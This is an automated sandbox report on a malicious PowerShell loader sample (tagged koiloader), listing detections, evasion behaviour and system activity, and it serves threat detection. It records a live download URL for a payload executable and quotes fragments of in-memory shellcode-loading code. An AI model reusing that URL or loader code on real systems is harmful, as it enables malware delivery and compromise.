Windows Analysis Report
1ZhE3yY8rV.ps1

Overview

General Information

Sample name: 1ZhE3yY8rV.ps1
renamed because original name is a hash value
Original sample name: e82c8bc4aab3e8cc32e924c5c6f56c0b557e44d7a4b035050af3effb015ee908.ps1
Analysis ID: 1542345
MD5: ea20c34ae2665307c372d81bfe2effda
SHA1: e384870516959d04dd002c52b0f16c30311eaf6f
SHA256: e82c8bc4aab3e8cc32e924c5c6f56c0b557e44d7a4b035050af3effb015ee908
Tags: 217-195-153-196, koiloader, ps1, TMBackdoor, user-JAMESWT_MHT

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: 1ZhE3yY8rV.ps1 Avira: detected
Source: 1ZhE3yY8rV.ps1 ReversingLabs: Detection: 31%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 96.8% probability
Source: Binary string: System.Configuration.Install.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb0Do source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbD source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdbJ* source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Numerics.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32* source: powershell.exe, 00000000.00000002.2158398672.0000019940402000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?\C:\Windows\System.Core.pdb source: powershell.exe, 00000000.00000002.2185663505.000001995A548000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb)p source: powershell.exe, 00000000.00000002.2185663505.000001995A548000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.DirectoryServices.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: CallSite.Targetore.pdb u source: powershell.exe, 00000000.00000002.2186782960.000001995A780000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdbMZ@ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Xml.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbXa source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: softy.pdbathuw source: powershell.exe, 00000000.00000002.2185663505.000001995A4C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Data.pdbH source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: mscorlib.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Configuration.Install.pdbSystem.Management.dllSystem.Xml.ni.dll source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.Automation.pdb3 source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Management.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2186782960.000001995A780000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Numerics.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.ni.pdb source: WERBC7F.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERBC7F.tmp.dmp.7.dr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: global traffic HTTP traffic detected: GET /assets/paleochorologyma.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 217.195.153.196 | Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 217.195.153.196
Source: powershell.exe, 00000000.00000002.2159022873.0000019943322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2159022873.0000019943B6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://217.195.153.196
Source: powershell.exe, 00000000.00000002.2159022873.0000019943D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://217.195.153.196/assets/paleo
Source: powershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmp, 1ZhE3yY8rV.ps1 String found in binary or memory: http://217.195.153.196/assets/paleochorologyma.exe
Source: powershell.exe, 00000000.00000002.2177577460.0000019952677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2159022873.00000199424C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.7.dr String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2159022873.00000199424C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2159022873.00000199426F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2159022873.0000019943322000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2177577460.0000019952677000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2177577460.0000019952535000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B7620DD 0_2_00007FFD9B7620DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7552 -s 2028
Source: classification engine Classification label: mal64.evad.winPS1@3/10@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7552
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uavqn0lg.tef.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: 1ZhE3yY8rV.ps1 ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1ZhE3yY8rV.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7552 -s 2028
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($VAAddr, $VADeleg)$CTAddr = GPA kernel32.dll CreateThread$CTDeleg = GDT @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])$CT = $marshal::GetDelegat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly($DA, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $MB = $AB.DefineDynamicModule('IMM', $false) $TB = $MB.DefineType('MDT', 'Class, Public, Sealed, AnsiClass, AutoCl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B7643A5 push edi; iretd 0_2_00007FFD9B7643A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B760952 push E95B72D0h; ret 0_2_00007FFD9B7609C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B7600BD pushad ; iretd 0_2_00007FFD9B7600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4592
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5278
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: powershell.exe, 00000000.00000002.2158398672.0000019940402000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_@
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: powershell.exe, 00000000.00000002.2186782960.000001995A7DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
Source: Amcache.hve.7.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
